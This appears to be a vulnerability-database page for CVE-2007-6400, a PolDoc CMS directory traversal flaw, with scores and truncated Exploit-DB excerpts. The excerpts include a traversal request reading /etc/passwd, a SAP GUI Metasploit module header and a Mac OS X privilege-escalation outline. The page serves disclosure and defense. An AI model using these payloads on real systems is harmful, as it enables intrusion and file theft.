CVE-2007-6400
published 2007-12-17CVE-2007-6400: Directory traversal vulnerability in download_file.php in PolDoc CMS (aka PDDMS) 0.96 allows remote attackers to read arbitrary files via a .. (dot dot) or…
PriorityP428medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
2.83%
84.8th percentile
Directory traversal vulnerability in download_file.php in PolDoc CMS (aka PDDMS) 0.96 allows remote attackers to read arbitrary files via a .. (dot dot) or absolute pathname in the filename parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| poldoc | poldoc_document_management_system | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
EnjoySAP SAP GUI - ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-06-15
CVE-2007-3605 EnjoySAP SAP GUI - ActiveX Control Buffer Overflow (Metasploit)
EnjoySAP SAP GUI - ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: enjoysapgui_preparetoposthtml.rb 9525 2010-06-15 07:18:08Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'EnjoySAP SAP GUI ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in SAP KWEdit ActiveX
Control (kwedit.dll 6400.1.1.41) provided by EnjoySAP GUI. By sending
an overly long string to the "PrepareToPostHTML()" method, an attacker
may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Auth
Exploit-DB
PolDoc CMS 0.96 - 'download_file.php' File Disclosure
exploitdb·2007-12-08
CVE-2007-6400 PolDoc CMS 0.96 - 'download_file.php' File Disclosure
PolDoc CMS 0.96 - 'download_file.php' File Disclosure
---
PolDoc CMS 0.96 (download_file.php filename) Remote File Disclosure Vulnerability
D . Script : http://sourceforge.net/project/showfiles.php?group_id=100272
POC : /download_file.php?filename=../../../../../../../../etc/passwd
# milw0rm.com [2007-12-08]
Exploit-DB
Apple Mac OSX 10.4.8 (8L2127) - 'crashdump' Local Privilege Escalation
exploitdb·2007-01-29
CVE-2007-0467 Apple Mac OSX 10.4.8 (8L2127) - 'crashdump' Local Privilege Escalation
Apple Mac OSX 10.4.8 (8L2127) - 'crashdump' Local Privilege Escalation
---
#!/usr/bin/ruby
# Copyright (c) 2007 Kevin Finisterre
# Lance M. Havok
# All pwnage reserved.
#
# 1) Stop crashdump from writing to ~/Library/Logs via chmod 000 ~/Library/Logs/CrashReporter
# 2) Make symlink to /Library/Logs/CrashReporter/knownprog.crash.log
# 3) Create a program with a modified __LINKEDIT segment that influences crashreporter output
#
# 0000320: 3800 0000 5f5f 4c49 4e4b 4544 4954 0000 8...__LINKEDIT..
# 0000330: 0000 0000 0040 0000 0010 0000 0030 0000 [email protected]..
# 0000340: 2004 0000 0300 0000 0100 0000 0000 0000 ...............
# 0000350: 0400 0000 0e00 0000 1c00 0000 0c00 0000 ................
# 0000360: 2f75 7372 2f6c 6962 2f64 796c 6400 0000 /usr/lib/dyld...
# 0000370: 0c00 0000 3400 000
No writeups or analysis indexed.
http://secunia.com/advisories/28013http://www.securityfocus.com/bid/26775http://www.vupen.com/english/advisories/2007/4159https://exchange.xforce.ibmcloud.com/vulnerabilities/38937https://www.exploit-db.com/exploits/4704http://secunia.com/advisories/28013http://www.securityfocus.com/bid/26775http://www.vupen.com/english/advisories/2007/4159https://exchange.xforce.ibmcloud.com/vulnerabilities/38937https://www.exploit-db.com/exploits/4704
2007-12-17
Published